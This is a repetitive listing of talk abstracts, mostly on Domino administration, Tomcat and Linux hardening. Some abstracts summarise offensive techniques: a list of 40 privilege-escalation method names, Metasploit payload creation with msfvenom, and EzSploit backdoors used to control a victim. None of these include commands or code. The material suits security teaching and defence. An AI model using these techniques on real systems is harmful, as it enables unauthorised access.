This document provides an agenda for a session on adding calendars to Domino web applications using FullCalendar. It will cover:
- An introduction to the presenters and their goals for the session
- An overview of what FullCalendar is and how it can be used
- An example of implementing FullCalendar in an XPages application with a REST service to populate calendar entries
- Options for using FullCalendar if no longer using XPages, such as with Angular, React, or a standalone REST service
The session will demonstrate building a FullCalendar component in an XPages application that retrieves and saves calendar entries to Domino via a REST service and Java class. It will also discuss approaches to re-architect
The document discusses different multi-threading models: many-to-one, one-to-one, and many-to-many. The many-to-one model maps many user threads to a single kernel thread, allowing for efficient thread management but blocking all threads during system calls. The one-to-one model maps each user thread to its own kernel thread, enabling more concurrency and parallelism across processors but requiring more kernel resources. The many-to-many model multiplexes user threads to kernel threads, allowing scheduling around blocking system calls while using kernel resources efficiently.
The document provides an overview of Tomcat and JBoss, open-source servlet containers. It discusses the origins and frameworks of Tomcat and JBoss, how to get started with Tomcat configuration, deployment, security, and load balancing of Tomcat instances with Apache HTTP Server. Key configuration files for Tomcat are also summarized.
IBM MQ systems route billions of messages around the world each day. This presentation looks at the tools available in MQ for z/OS to allow you to understand where your messages are flowing, and things you can use if the messages aren't going where you expect.
Domino Tech School - Upgrading to Notes/Domino V10: Best PracticesChristoph Adler
Are you looking to deploy Domino V10 but don’t know where to start? Upgrade servers or clients first? Should I upgrade the ODS? If you have questions like these, this session is for you. Get a complete understanding of the process to upgrade to Domino V10, and learn from best practices and tips from the field.
AdminP is an elementary server task for your IBM Lotus Domino Administration. This session explains which administration processes are available and how those can make your day-to-day administration tasks easier. We will cover the best practices for setup and troubleshooting using AdminP, in projects like recertifications and server consolidations.
IBM Notes Traveler Administration and Log Troubleshooting tips - Part 2jayeshpar2006
This document summarizes an IBM Notes Traveler Administration and Log Troubleshooting session. It discusses understanding Traveler activity, error, and usage logs to help troubleshoot issues. Specifically, it demonstrates how to analyze logs to resolve two cases: 1) Users complaining of slow synchronization and errors connecting to the server, and 2) The Traveler server keeps going into red status. For the first case, it shows checking system dumps, CPU/memory usage, and activity logs to identify that high database connections were causing constrained server resources. For the second case, it briefly mentions another example of analyzing logs to resolve slow mail issues.
This document provides an agenda for a session on adding calendars to Domino web applications using FullCalendar. It will cover:
- An introduction to the presenters and their goals for the session
- An overview of what FullCalendar is and how it can be used
- An example of implementing FullCalendar in an XPages application with a REST service to populate calendar entries
- Options for using FullCalendar if no longer using XPages, such as with Angular, React, or a standalone REST service
The session will demonstrate building a FullCalendar component in an XPages application that retrieves and saves calendar entries to Domino via a REST service and Java class. It will also discuss approaches to re-architect
The document discusses different multi-threading models: many-to-one, one-to-one, and many-to-many. The many-to-one model maps many user threads to a single kernel thread, allowing for efficient thread management but blocking all threads during system calls. The one-to-one model maps each user thread to its own kernel thread, enabling more concurrency and parallelism across processors but requiring more kernel resources. The many-to-many model multiplexes user threads to kernel threads, allowing scheduling around blocking system calls while using kernel resources efficiently.
The document provides an overview of Tomcat and JBoss, open-source servlet containers. It discusses the origins and frameworks of Tomcat and JBoss, how to get started with Tomcat configuration, deployment, security, and load balancing of Tomcat instances with Apache HTTP Server. Key configuration files for Tomcat are also summarized.
IBM MQ systems route billions of messages around the world each day. This presentation looks at the tools available in MQ for z/OS to allow you to understand where your messages are flowing, and things you can use if the messages aren't going where you expect.
Domino Tech School - Upgrading to Notes/Domino V10: Best PracticesChristoph Adler
Are you looking to deploy Domino V10 but don’t know where to start? Upgrade servers or clients first? Should I upgrade the ODS? If you have questions like these, this session is for you. Get a complete understanding of the process to upgrade to Domino V10, and learn from best practices and tips from the field.
AdminP is an elementary server task for your IBM Lotus Domino Administration. This session explains which administration processes are available and how those can make your day-to-day administration tasks easier. We will cover the best practices for setup and troubleshooting using AdminP, in projects like recertifications and server consolidations.
IBM Notes Traveler Administration and Log Troubleshooting tips - Part 2jayeshpar2006
This document summarizes an IBM Notes Traveler Administration and Log Troubleshooting session. It discusses understanding Traveler activity, error, and usage logs to help troubleshoot issues. Specifically, it demonstrates how to analyze logs to resolve two cases: 1) Users complaining of slow synchronization and errors connecting to the server, and 2) The Traveler server keeps going into red status. For the first case, it shows checking system dumps, CPU/memory usage, and activity logs to identify that high database connections were causing constrained server resources. For the second case, it briefly mentions another example of analyzing logs to resolve slow mail issues.
Bewährte Praktiken für HCL Notes/Domino-Sicherheit. Teil 2: Der Domino-Serverpanagenda
Aufnahme: http://pan.news/20210420de
Abstract: Server sind das Rückgrat Ihrer IT-Umgebung. Deren Sicherheit ist für jeden IT-Profi von größter Bedeutung. Besonders bei Servern mit Fernzugriff wird dies zu einer heiklen Angelegenheit. Es ist ein schmaler Grat zwischen der komfortablen Nutzung auf der einen Seite und dem Schutz gegen Angreifer auf der anderen Seite.
Zu den Sicherheitsbedenken gehören die mangelnde physische Sicherheit von Geräten, die Verwendung ungesicherter Netzwerke, die ungewollte externe Verfügbarkeit interner Ressourcen und der unbefugte Zugriff aus dem eigenen Unternehmen.
HCL Domino ist eine leistungsfähige und ausgereifte Serverplattform mit einem großen Funktionsumfang. Das macht sie zwar zu einer guten Wahl für viele Anwendungen, bedeutet aber auch, dass es viele potenzielle Möglichkeiten gibt, sich angreifbar zu machen.
In diesem Webinar helfen Ihnen unsere Experten, jeden Aspekt der Absicherung Ihrer Domino-Umgebungen zu betrachten:
• Lernen Sie die Grundlagen der Domino-Server-Sicherheit kennen
• Beheben Sie Probleme mit der Standardkonfiguration und vermeiden Sie häufige Fallstricke
• Sorgen Sie für einen sicheren Zugriff über Notes-Client, HTTP oder SMTP
• Richten Sie eine Datenbank-Zugriffskontrolle für Ihre gesamte Infrastruktur ein
• Schützen Sie Ihre Server vor internen Angriffen
• Vermeiden Sie Schwachstellen, indem Sie Domino-Server und Betriebssystem auf dem neuesten Stand halten
IBM Lotus Domino Domain Monitoring (DDM)Austin Chang
This document provides an overview of Lotus Domino Server Domain Monitoring (DDM) for administrators. DDM allows administrators to monitor servers in their domain through configurable probes that check for issues and automate corrective actions. It discusses the key components of DDM including the server collection hierarchy, monitoring configuration, probes, and filters. It also provides examples of how to set up monitoring for common scenarios like database compaction, replication, and system resources.
What is new in Notes & Domino Deleopment V10.xUlrich Krause
Slides for my siession at DNUG46 in Essen, Germany. 04.-05-MAY-2019.
The session was all about the new classes added in V10.x of Notes/Domino. FP2 changes are included.
How to Bring HCL Nomad Web and Domino Together Without SafeLinxpanagenda
Webinar Recording: https://www.panagenda.com/webinars/how-to-bring-hcl-nomad-and-domino-together-without-safelinx/
HCL Nomad Web is the way forward. It allows users to decide for themselves when and where they want to use the application. Naturally promoting business flexibility and increasing overall employee productivity. Besides, the way forward gets a lot easier if you can bring HCL Nomad Web and Domino together without SafeLinx.
So, you want to start with Nomad Web, the new and shiny client in the browser. But there are so many hurdles in the way. Luckily, with Domino 12.0.2, a big one is gone. The new Nomad Web Server on Domino makes it possible to have Nomad Web talk directly to Domino. You do not have to use SafeLinx unless you really want to!
Join Christoph Adler, HCL Ambassador & panagenda Senior Consultant, on December 13 for this webinar featuring live demos and hands-on examples. Gain the skills you need to run Nomad Web directly with Domino and to use HCL Nomad and Domino without SafeLinx. You will leave with a simple recipe that makes it easy to get going in your environment.
In our webinar, about how to run HCL Nomad Configurations on any device, we showed you that MarvelClient Roaming can help you solve many challenges. It enables you to automatically back up, restore, and share configurations (desktop, recent apps, settings, and more) among devices using Nomad. It uploads configurations to your Domino servers whenever they are changed, and then transparently updates any current and new devices used by the same person, with a tiny network and processing footprint. This time we go a little further.
What you will learn
- How to use HCL Nomad Web and Domino together without SafeLinx
- How to install and configure the Nomad Web Server
- How the Nomad Web Server works from a user’s point of view
- Which scenarios you might want to keep using SafeLinx
April, 2021 OpenNTF Webinar - Domino Administration Best PracticesHoward Greenberg
While installing a new HCL Domino server is a relatively straight forward task, configuring the server properly requires knowledge. Lacking this knowledge means that several key steps may be missed resulting in a server with potential security and performance issues. Additionally there are several key features that will save you time on administration of the server. Domino server settings also affect the performance and security of custom applications. Even if you are a developer you should be aware of the options available when configuring a server.
Join our incredibly experienced presenters as they share their many years of Domino expertise. They will cover the finer details to correctly setup a Domino server environment that is optimized for performance, security and sustainable administration. Plus use this information presented in this webinar to modify and improve your existing server environment.
Presenters:
Heather Hottenstein, HCL Ambassador
Roberto Boccadoro, HCL Ambassador
Serdar Basegmez, HCL Ambassador
Additonal Panelists (Q and A)
John Paganetti, HCL
40 Methods for Privilege Escalation - Part 1
Privilege escalation is the act of exploiting a bug, a design flaw, or a configuration oversight in an operating system or software application to gain elevated access to resources that are normally protected from an application or user.
The first part of Privilege escalation methods with complete Descriptions:
1. Abusing Sudo Binaries
2. Abusing Scheduled Tasks
3. Golden Ticket With Scheduled Tasks
4. Abusing Interpreter Capabilities
5. Abusing Binary Capabilities
6. Abusing ActiveSessions Capabilities
7. Escalate with TRUSTWORTHY in SQL Server
8. Abusing Mysql run as root
9. Abusing journalctl
10. Abusing VDS
11. Abusing Browser
12. Abusing LDAP
13. LLMNR Poisoning
14. Abusing Certificate Services
15. MySQL UDF Code Injection
16. Impersonation Token with ImpersonateLoggedOnuser
17. Impersonation Token with SeImpersontePrivilege
18. Impersonation Token with SeLoadDriverPrivilege
19. OpenVPN Credentials
20. Bash History
21. Package Capture
22. NFS Root Squashing
23. Abusing Access Control List
24. Escalate With SeBackupPrivilege
25. Escalate With SeImpersonatePrivilege
26. Escalate With SeLoadDriverPrivilege
27. Escalate With ForceChangePassword
28. Escalate With GenericWrite
29. Abusing GPO
30. Pass-the-Ticket
31. Golden Ticket
32. Abusing Splunk Universal Forwarder
33. Abusing Gdbus
34. Abusing Trusted DC
35. NTLM Relay
36. Exchange Relay
37. Dumping with diskshadow
38. Dumping with vssadmin
39. Password Spraying
40. AS-REP Roasting Kerberoasting
Methods for Privilege Escalation Part One.pdfrimaNova1
The document provides 40 methods for privilege escalation on Linux and Windows systems, organized into different categories. Some of the methods involve abusing privileges of programs run as root like sudo, abusing interpreters with escalated capabilities, injecting code through SQL or Windows services, exploiting scheduled tasks, sniffing network traffic, enumerating bash history files, and more. Many of the techniques require finding and exploiting vulnerable configurations or bugs in programs or services to elevate privileges on the target system.
Jaime Piña, @variadico, Software Engineer at Apcera
Microservice issues are networking issues. Fixing code in your app is easy, but the hard part of using microservices is the networking. How do you actually know if you're sending what you think you are? Why does this request fail in my app, but not when I use curl? Is this service very slow or is it up at all?
This talk will help demystify some common problems you might experience while building out your collection of microservices. Once you can find the issue, it becomes way easier to fix.
The document discusses various methods for locking down a FreeBSD installation, including establishing a security policy, hardening access controls, and monitoring the system. Some key points covered are:
- Establish a default deny security policy with authentication required for all access and logging of all exceptions.
- Hardening involves securing the network stack, enabling a firewall, restricting inetd, using TCP wrappers, and implementing IPSec.
- Additional hardening includes removing known vulnerabilities, increasing the secure level, protecting against resource exhaustion, and restricting services.
- Intrusion detection involves tools like Tripwire, SysTrace, Snort, and honeypots, while auditing focuses on authentication and monitoring logs.
The document provides an outline for hacking different systems including performing internet footprinting, hacking Windows systems, hacking Unix/Linux systems, and hacking networks. It discusses techniques for scanning systems, enumerating services and users, penetrating targets by exploiting services or escalating privileges, gaining interactive access, and maintaining influence. It provides examples of tools that can be used for reconnaissance, attacks, and privilege escalation on the different system types. The document also covers vulnerabilities in systems like SNMP, HTTP, TFTP, and routing protocols that can be exploited, and techniques for dealing with firewalls like port scanning and redirection.
Introduction to metasploit that we presented to the 4th year compsci students at Rhodes university.Covering the basic functionality of metasploit, and penetration testing.
The practical section that Etienne made (with Ponies) will come soon.
Metasploit for Penetration Testing: Beginner ClassGeorgia Weidman
1. An introduction to Metasploit basics, terminology, and interfaces like Msfconsole.
2. A demonstration of exploiting vulnerabilities using Metasploit modules and payloads like Meterpreter.
3. A discussion of post-exploitation techniques in Metasploit like privilege escalation, lateral movement, and maintaining access.
Derbycon 2019 - I simulate therefore i catch: enhancing detection engineering...Mauricio Velazco
https://www.youtube.com/watch?v=7TVp4g4hkpg
Defending enterprise networks against attackers continues to present a difficult challenge for blue teams. Prevention has fallen short; improving detection & response capabilities has proven to be a step in the right direction. However, without the telemetry produced by adversary behavior, building new and testing existing detection capabilities will be constrained. Executing adversary simulations in monitored environments produces the telemetry that allows blue teams to identify gaps in visibility as well as build, test and enhance detection analytics.This presentation will describe a methodology to incorporate adversary simulation into detection programs as well as release a tool blue teams can use to test the resilience of detection controls
This document provides guidance on hardening a Linux server for security. It recommends following the CIS and NSA security benchmarks. It suggests choosing a server-oriented Linux distribution, keeping partitions and filesystems separate, encrypting partitions and the running server, securing the boot process, using iptables and TCP wrappers for firewalls, restricting root access and using sudo, enforcing password policies, removing unnecessary packages and services, securing remote administration like SSH, disabling unnecessary Linux modules, and implementing auditing and integrity checks.
This document provides an introduction to Metasploit, a penetration testing platform used to find, exploit, and validate vulnerabilities. It discusses how to create an Android payload file using msfvenom, send it to a target device, and use Metasploit to interact with the device after payload execution. The document also lists some advantages and disadvantages of Metasploit and references used.
Linux Security APIs and the Chromium SandboxPatricia Aas
The Linux Security and Isolation APIs have become the basis of some of the most useful features server-side, providing the isolation required for efficient containers. However, these APIs also form the basis of the Chromium Sandbox on Linux, and we will study them in that context.
The Chromium Sandbox is used in the Vivaldi, Brave, Chrome and Opera browsers among others. It has a very platform specific implementation, using the platform APIs available to construct it. In this talk we will describe the requirements of the Chromium Sandbox and go through the steps and APIs used to construct it on Linux.
Fundamentals of Linux Privilege Escalationnullthreat
This document provides an introduction to techniques for Linux privilege escalation. It discusses exploiting vulnerabilities like kernel exploits, taking advantage of permissive file permissions like world-readable/writable files and SetUID programs, exploiting overly permissive sudo configurations, and issues that can arise from improper PATH variable configuration like executing a Trojan program. The document demonstrates finding and using exploits, identifying vulnerable configurations, and how an attacker could leverage each technique to escalate privileges on a target Linux system. It also provides recommendations for how to protect against these methods through patching, auditing permissions and configurations, and restricting what programs can be executed with elevated privileges.
Bewährte Praktiken für HCL Notes/Domino-Sicherheit. Teil 2: Der Domino-Serverpanagenda
Aufnahme: http://pan.news/20210420de
Abstract: Server sind das Rückgrat Ihrer IT-Umgebung. Deren Sicherheit ist für jeden IT-Profi von größter Bedeutung. Besonders bei Servern mit Fernzugriff wird dies zu einer heiklen Angelegenheit. Es ist ein schmaler Grat zwischen der komfortablen Nutzung auf der einen Seite und dem Schutz gegen Angreifer auf der anderen Seite.
Zu den Sicherheitsbedenken gehören die mangelnde physische Sicherheit von Geräten, die Verwendung ungesicherter Netzwerke, die ungewollte externe Verfügbarkeit interner Ressourcen und der unbefugte Zugriff aus dem eigenen Unternehmen.
HCL Domino ist eine leistungsfähige und ausgereifte Serverplattform mit einem großen Funktionsumfang. Das macht sie zwar zu einer guten Wahl für viele Anwendungen, bedeutet aber auch, dass es viele potenzielle Möglichkeiten gibt, sich angreifbar zu machen.
In diesem Webinar helfen Ihnen unsere Experten, jeden Aspekt der Absicherung Ihrer Domino-Umgebungen zu betrachten:
• Lernen Sie die Grundlagen der Domino-Server-Sicherheit kennen
• Beheben Sie Probleme mit der Standardkonfiguration und vermeiden Sie häufige Fallstricke
• Sorgen Sie für einen sicheren Zugriff über Notes-Client, HTTP oder SMTP
• Richten Sie eine Datenbank-Zugriffskontrolle für Ihre gesamte Infrastruktur ein
• Schützen Sie Ihre Server vor internen Angriffen
• Vermeiden Sie Schwachstellen, indem Sie Domino-Server und Betriebssystem auf dem neuesten Stand halten
IBM Lotus Domino Domain Monitoring (DDM)Austin Chang
This document provides an overview of Lotus Domino Server Domain Monitoring (DDM) for administrators. DDM allows administrators to monitor servers in their domain through configurable probes that check for issues and automate corrective actions. It discusses the key components of DDM including the server collection hierarchy, monitoring configuration, probes, and filters. It also provides examples of how to set up monitoring for common scenarios like database compaction, replication, and system resources.
What is new in Notes & Domino Deleopment V10.xUlrich Krause
Slides for my siession at DNUG46 in Essen, Germany. 04.-05-MAY-2019.
The session was all about the new classes added in V10.x of Notes/Domino. FP2 changes are included.
How to Bring HCL Nomad Web and Domino Together Without SafeLinxpanagenda
Webinar Recording: https://www.panagenda.com/webinars/how-to-bring-hcl-nomad-and-domino-together-without-safelinx/
HCL Nomad Web is the way forward. It allows users to decide for themselves when and where they want to use the application. Naturally promoting business flexibility and increasing overall employee productivity. Besides, the way forward gets a lot easier if you can bring HCL Nomad Web and Domino together without SafeLinx.
So, you want to start with Nomad Web, the new and shiny client in the browser. But there are so many hurdles in the way. Luckily, with Domino 12.0.2, a big one is gone. The new Nomad Web Server on Domino makes it possible to have Nomad Web talk directly to Domino. You do not have to use SafeLinx unless you really want to!
Join Christoph Adler, HCL Ambassador & panagenda Senior Consultant, on December 13 for this webinar featuring live demos and hands-on examples. Gain the skills you need to run Nomad Web directly with Domino and to use HCL Nomad and Domino without SafeLinx. You will leave with a simple recipe that makes it easy to get going in your environment.
In our webinar, about how to run HCL Nomad Configurations on any device, we showed you that MarvelClient Roaming can help you solve many challenges. It enables you to automatically back up, restore, and share configurations (desktop, recent apps, settings, and more) among devices using Nomad. It uploads configurations to your Domino servers whenever they are changed, and then transparently updates any current and new devices used by the same person, with a tiny network and processing footprint. This time we go a little further.
What you will learn
- How to use HCL Nomad Web and Domino together without SafeLinx
- How to install and configure the Nomad Web Server
- How the Nomad Web Server works from a user’s point of view
- Which scenarios you might want to keep using SafeLinx
April, 2021 OpenNTF Webinar - Domino Administration Best PracticesHoward Greenberg
While installing a new HCL Domino server is a relatively straight forward task, configuring the server properly requires knowledge. Lacking this knowledge means that several key steps may be missed resulting in a server with potential security and performance issues. Additionally there are several key features that will save you time on administration of the server. Domino server settings also affect the performance and security of custom applications. Even if you are a developer you should be aware of the options available when configuring a server.
Join our incredibly experienced presenters as they share their many years of Domino expertise. They will cover the finer details to correctly setup a Domino server environment that is optimized for performance, security and sustainable administration. Plus use this information presented in this webinar to modify and improve your existing server environment.
Presenters:
Heather Hottenstein, HCL Ambassador
Roberto Boccadoro, HCL Ambassador
Serdar Basegmez, HCL Ambassador
Additonal Panelists (Q and A)
John Paganetti, HCL
40 Methods for Privilege Escalation - Part 1
Privilege escalation is the act of exploiting a bug, a design flaw, or a configuration oversight in an operating system or software application to gain elevated access to resources that are normally protected from an application or user.
The first part of Privilege escalation methods with complete Descriptions:
1. Abusing Sudo Binaries
2. Abusing Scheduled Tasks
3. Golden Ticket With Scheduled Tasks
4. Abusing Interpreter Capabilities
5. Abusing Binary Capabilities
6. Abusing ActiveSessions Capabilities
7. Escalate with TRUSTWORTHY in SQL Server
8. Abusing Mysql run as root
9. Abusing journalctl
10. Abusing VDS
11. Abusing Browser
12. Abusing LDAP
13. LLMNR Poisoning
14. Abusing Certificate Services
15. MySQL UDF Code Injection
16. Impersonation Token with ImpersonateLoggedOnuser
17. Impersonation Token with SeImpersontePrivilege
18. Impersonation Token with SeLoadDriverPrivilege
19. OpenVPN Credentials
20. Bash History
21. Package Capture
22. NFS Root Squashing
23. Abusing Access Control List
24. Escalate With SeBackupPrivilege
25. Escalate With SeImpersonatePrivilege
26. Escalate With SeLoadDriverPrivilege
27. Escalate With ForceChangePassword
28. Escalate With GenericWrite
29. Abusing GPO
30. Pass-the-Ticket
31. Golden Ticket
32. Abusing Splunk Universal Forwarder
33. Abusing Gdbus
34. Abusing Trusted DC
35. NTLM Relay
36. Exchange Relay
37. Dumping with diskshadow
38. Dumping with vssadmin
39. Password Spraying
40. AS-REP Roasting Kerberoasting
Methods for Privilege Escalation Part One.pdfrimaNova1
The document provides 40 methods for privilege escalation on Linux and Windows systems, organized into different categories. Some of the methods involve abusing privileges of programs run as root like sudo, abusing interpreters with escalated capabilities, injecting code through SQL or Windows services, exploiting scheduled tasks, sniffing network traffic, enumerating bash history files, and more. Many of the techniques require finding and exploiting vulnerable configurations or bugs in programs or services to elevate privileges on the target system.
Jaime Piña, @variadico, Software Engineer at Apcera
Microservice issues are networking issues. Fixing code in your app is easy, but the hard part of using microservices is the networking. How do you actually know if you're sending what you think you are? Why does this request fail in my app, but not when I use curl? Is this service very slow or is it up at all?
This talk will help demystify some common problems you might experience while building out your collection of microservices. Once you can find the issue, it becomes way easier to fix.
The document discusses various methods for locking down a FreeBSD installation, including establishing a security policy, hardening access controls, and monitoring the system. Some key points covered are:
- Establish a default deny security policy with authentication required for all access and logging of all exceptions.
- Hardening involves securing the network stack, enabling a firewall, restricting inetd, using TCP wrappers, and implementing IPSec.
- Additional hardening includes removing known vulnerabilities, increasing the secure level, protecting against resource exhaustion, and restricting services.
- Intrusion detection involves tools like Tripwire, SysTrace, Snort, and honeypots, while auditing focuses on authentication and monitoring logs.
The document provides an outline for hacking different systems including performing internet footprinting, hacking Windows systems, hacking Unix/Linux systems, and hacking networks. It discusses techniques for scanning systems, enumerating services and users, penetrating targets by exploiting services or escalating privileges, gaining interactive access, and maintaining influence. It provides examples of tools that can be used for reconnaissance, attacks, and privilege escalation on the different system types. The document also covers vulnerabilities in systems like SNMP, HTTP, TFTP, and routing protocols that can be exploited, and techniques for dealing with firewalls like port scanning and redirection.
Introduction to metasploit that we presented to the 4th year compsci students at Rhodes university.Covering the basic functionality of metasploit, and penetration testing.
The practical section that Etienne made (with Ponies) will come soon.
Metasploit for Penetration Testing: Beginner ClassGeorgia Weidman
1. An introduction to Metasploit basics, terminology, and interfaces like Msfconsole.
2. A demonstration of exploiting vulnerabilities using Metasploit modules and payloads like Meterpreter.
3. A discussion of post-exploitation techniques in Metasploit like privilege escalation, lateral movement, and maintaining access.
Derbycon 2019 - I simulate therefore i catch: enhancing detection engineering...Mauricio Velazco
https://www.youtube.com/watch?v=7TVp4g4hkpg
Defending enterprise networks against attackers continues to present a difficult challenge for blue teams. Prevention has fallen short; improving detection & response capabilities has proven to be a step in the right direction. However, without the telemetry produced by adversary behavior, building new and testing existing detection capabilities will be constrained. Executing adversary simulations in monitored environments produces the telemetry that allows blue teams to identify gaps in visibility as well as build, test and enhance detection analytics.This presentation will describe a methodology to incorporate adversary simulation into detection programs as well as release a tool blue teams can use to test the resilience of detection controls
This document provides guidance on hardening a Linux server for security. It recommends following the CIS and NSA security benchmarks. It suggests choosing a server-oriented Linux distribution, keeping partitions and filesystems separate, encrypting partitions and the running server, securing the boot process, using iptables and TCP wrappers for firewalls, restricting root access and using sudo, enforcing password policies, removing unnecessary packages and services, securing remote administration like SSH, disabling unnecessary Linux modules, and implementing auditing and integrity checks.
This document provides an introduction to Metasploit, a penetration testing platform used to find, exploit, and validate vulnerabilities. It discusses how to create an Android payload file using msfvenom, send it to a target device, and use Metasploit to interact with the device after payload execution. The document also lists some advantages and disadvantages of Metasploit and references used.
Linux Security APIs and the Chromium SandboxPatricia Aas
The Linux Security and Isolation APIs have become the basis of some of the most useful features server-side, providing the isolation required for efficient containers. However, these APIs also form the basis of the Chromium Sandbox on Linux, and we will study them in that context.
The Chromium Sandbox is used in the Vivaldi, Brave, Chrome and Opera browsers among others. It has a very platform specific implementation, using the platform APIs available to construct it. In this talk we will describe the requirements of the Chromium Sandbox and go through the steps and APIs used to construct it on Linux.
Fundamentals of Linux Privilege Escalationnullthreat
This document provides an introduction to techniques for Linux privilege escalation. It discusses exploiting vulnerabilities like kernel exploits, taking advantage of permissive file permissions like world-readable/writable files and SetUID programs, exploiting overly permissive sudo configurations, and issues that can arise from improper PATH variable configuration like executing a Trojan program. The document demonstrates finding and using exploits, identifying vulnerable configurations, and how an attacker could leverage each technique to escalate privileges on a target Linux system. It also provides recommendations for how to protect against these methods through patching, auditing permissions and configurations, and restricting what programs can be executed with elevated privileges.
EzSploit is a Linux bash script that automates the use of Metasploit to hack Linux systems. It allows easy generation of backdoors for Linux, Windows, and Android by compiling payloads and files to target specific platforms. The document outlines how to use EzSploit to create payloads, set up a multi-handler on Kali Linux to receive the payload, install the payload on a target Linux system, and then issue commands through Metasploit's meterpreter shell to control the victim system. It concludes by advising users to keep their systems updated and use antivirus software to protect against backdoors created by tools like EzSploit.
Derbycon 2017: Hunting Lateral Movement For Fun & ProfitMauricio Velazco
After obtaining an initial foothold on an environment, attackers are forced to embark in lateral movement techniques in order to be successful in identifying and exfiltrating sensitive information. To stay ahead of the bad guys, the Blue team needs to have a clear understanding of these techniques as well as the forensic artifacts these techniques leave behind on the victim hosts. Armed with this knowledge, we can proactively hunt for lateral movement in the environment before exfiltration can occur. This presentation will analyze Lateral Movement from both a Red and Blue team perspective and introduce Oriana, a lateral movement hunting tool that can assist the Blue team in catching the adversary.
This document provides an introduction to Metasploit, a penetration testing platform that enables users to find, exploit, and validate vulnerabilities. It discusses how Metasploit has various interfaces including a console and GUI, and describes some key advantages like its large community and frequent updates. The document then outlines steps to hack an Android device using Metasploit, including creating a payload file, sending it to the target, running Metasploit to exploit the victim's Android.
This document provides an overview and agenda for a Metasploit training session. It begins with a disclaimer that the information presented is for educational purposes only. The agenda includes introductions to Metasploit basics, information gathering, exploitation, Meterpreter basics and post-exploitation, Meterpreter scripts, Metasploit utilities like Msfpayload and Msfencode, client-side attacks, and auxiliary modules. Breaks for tea and lunch are also included on the agenda.
The document provides instructions on how to configure an SSH server on Linux, perform footprinting and reconnaissance, scanning tools and techniques, enumeration tools and techniques, password cracking techniques and tools, privilege escalation methods, and keylogging and hidden file techniques. It discusses active and passive footprinting, Nmap port scanning, NetBIOS and SNMP enumeration, Windows password hashes, the sticky keys method for privilege escalation, ActualSpy keylogging software, and hiding files using NTFS alternate data streams. Countermeasures for many of these techniques are also outlined.
Similar to 74 Methods for Privilege Escalation Part 2 (20)
Best 20 SEO Techniques To Improve Website Visibility In SERPPixlogix Infotech
Boost your website's visibility with proven SEO techniques! Our latest blog dives into essential strategies to enhance your online presence, increase traffic, and rank higher on search engines. From keyword optimization to quality content creation, learn how to make your site stand out in the crowded digital landscape. Discover actionable tips and expert insights to elevate your SEO game.
Building Production Ready Search Pipelines with Spark and MilvusZilliz
Spark is the widely used ETL tool for processing, indexing and ingesting data to serving stack for search. Milvus is the production-ready open-source vector database. In this talk we will show how to use Spark to process unstructured data to extract vector representations, and push the vectors to Milvus vector database for search serving.
Trusted Execution Environment for Decentralized Process MiningLucaBarbaro3
Presentation of the paper "Trusted Execution Environment for Decentralized Process Mining" given during the CAiSE 2024 Conference in Cyprus on June 7, 2024.
GraphRAG for Life Science to increase LLM accuracyTomaz Bratanic
GraphRAG for life science domain, where you retriever information from biomedical knowledge graphs using LLMs to increase the accuracy and performance of generated answers
Introduction of Cybersecurity with OSS at Code Europe 2024Hiroshi SHIBATA
I develop the Ruby programming language, RubyGems, and Bundler, which are package managers for Ruby. Today, I will introduce how to enhance the security of your application using open-source software (OSS) examples from Ruby and RubyGems.
The first topic is CVE (Common Vulnerabilities and Exposures). I have published CVEs many times. But what exactly is a CVE? I'll provide a basic understanding of CVEs and explain how to detect and handle vulnerabilities in OSS.
Next, let's discuss package managers. Package managers play a critical role in the OSS ecosystem. I'll explain how to manage library dependencies in your application.
I'll share insights into how the Ruby and RubyGems core team works to keep our ecosystem safe. By the end of this talk, you'll have a better understanding of how to safeguard your code.
Let's Integrate MuleSoft RPA, COMPOSER, APM with AWS IDP along with Slackshyamraj55
Discover the seamless integration of RPA (Robotic Process Automation), COMPOSER, and APM with AWS IDP enhanced with Slack notifications. Explore how these technologies converge to streamline workflows, optimize performance, and ensure secure access, all while leveraging the power of AWS IDP and real-time communication via Slack notifications.
5th LF Energy Power Grid Model Meet-up SlidesDanBrown980551
5th Power Grid Model Meet-up
It is with great pleasure that we extend to you an invitation to the 5th Power Grid Model Meet-up, scheduled for 6th June 2024. This event will adopt a hybrid format, allowing participants to join us either through an online Mircosoft Teams session or in person at TU/e located at Den Dolech 2, Eindhoven, Netherlands. The meet-up will be hosted by Eindhoven University of Technology (TU/e), a research university specializing in engineering science & technology.
Power Grid Model
The global energy transition is placing new and unprecedented demands on Distribution System Operators (DSOs). Alongside upgrades to grid capacity, processes such as digitization, capacity optimization, and congestion management are becoming vital for delivering reliable services.
Power Grid Model is an open source project from Linux Foundation Energy and provides a calculation engine that is increasingly essential for DSOs. It offers a standards-based foundation enabling real-time power systems analysis, simulations of electrical power grids, and sophisticated what-if analysis. In addition, it enables in-depth studies and analysis of the electrical power grid’s behavior and performance. This comprehensive model incorporates essential factors such as power generation capacity, electrical losses, voltage levels, power flows, and system stability.
Power Grid Model is currently being applied in a wide variety of use cases, including grid planning, expansion, reliability, and congestion studies. It can also help in analyzing the impact of renewable energy integration, assessing the effects of disturbances or faults, and developing strategies for grid control and optimization.
What to expect
For the upcoming meetup we are organizing, we have an exciting lineup of activities planned:
-Insightful presentations covering two practical applications of the Power Grid Model.
-An update on the latest advancements in Power Grid -Model technology during the first and second quarters of 2024.
-An interactive brainstorming session to discuss and propose new feature requests.
-An opportunity to connect with fellow Power Grid Model enthusiasts and users.
Nunit vs XUnit vs MSTest Differences Between These Unit Testing Frameworks.pdfflufftailshop
When it comes to unit testing in the .NET ecosystem, developers have a wide range of options available. Among the most popular choices are NUnit, XUnit, and MSTest. These unit testing frameworks provide essential tools and features to help ensure the quality and reliability of code. However, understanding the differences between these frameworks is crucial for selecting the most suitable one for your projects.
leewayhertz.com-AI in predictive maintenance Use cases technologies benefits ...alexjohnson7307
Predictive maintenance is a proactive approach that anticipates equipment failures before they happen. At the forefront of this innovative strategy is Artificial Intelligence (AI), which brings unprecedented precision and efficiency. AI in predictive maintenance is transforming industries by reducing downtime, minimizing costs, and enhancing productivity.
HCL Notes und Domino Lizenzkostenreduzierung in der Welt von DLAUpanagenda
Webinar Recording: https://www.panagenda.com/webinars/hcl-notes-und-domino-lizenzkostenreduzierung-in-der-welt-von-dlau/
